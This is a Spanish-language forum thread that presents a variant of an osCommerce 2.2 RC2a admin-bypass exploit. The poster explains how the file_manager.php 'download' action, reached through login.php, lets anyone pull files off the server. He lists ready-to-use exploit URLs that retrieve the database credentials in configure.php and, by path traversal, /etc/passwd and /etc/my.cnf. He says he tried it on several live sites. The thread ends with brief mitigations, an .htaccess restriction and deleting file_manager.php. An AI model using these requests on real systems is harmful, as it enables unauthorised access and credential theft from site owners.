Título: [º] Exploit en osCommerce Online Merchant v2.2 RC2a Publicado por: CODE:NIAL en 15 Noviembre 2009, 05:02 am Hola a todos.
He descubierto una variante del exploit publicada por Flyh4t en el sitio de milw0rm.com http://www.milw0rm.com/exploits/9556 En este exploit no se explica la vulnerabilidad pero parece ser problema del archivo file_manager.php, ya que se puede bypassear al login.php. En fin, este exploit describe que con la accion save (login.php?action=save) se puede crear un archivo con una shell en php. Código:
Me di a la tarea de analizar el archivo y descubrí que la accion save no es la única que nos puede dar beneficios, ya que en el archivo está dada de alta otra funcion llamada download. De esta manera especificando la acción download con el respectivo nombre de archivo (login.php?action=download&filename=archivo) se pueden descargar archivos del servidor. Qué diferencia hay entre el exploit publicado en milw0rm y la variante que les presento???. Bueno que en la mayoría de los sitios que probé no tenian permisos para escribir en ese directorio, por lo cual el exploit de milw0rm no pegó. En cambio con la variante pude descargarme los archivos en todo el server (con safe mode off) :D. En estos momentos estoy buscando en el código cuál fue el problema. El vendor dice que ya se hicieron los fix al problema,etc... ::) Conclusión: Exploits: (Archivo de configuraciones con el user y pass de la db) http://vulnsite/admin/file_manager.php/login.php?action=download&filename=includes/configure.php Ejemplo de descarga de otros archivos en el servidor no relacionados a oscommerce. http://vulnsite/admin/file_manager.php/login.php?action=download&filename=../../../../../../../../../etc/passwd http://vulnsite/admin/file_manager.php/login.php?action=download&filename=../../../../../../../../../etc/my.cnf Solución más rápida: Configurar htaccess para impedir acceder a estos directorios y archivos sin firmarse. Se aceptan críticas y comentarios. Título: Re: [º] Exploit en osCommerce Online Merchant v2.2 RC2a Publicado por: imefisto en 11 Noviembre 2010, 15:31 pm Otra solución rápida a esto es eliminar el casi siempre inútil file_manager.php
|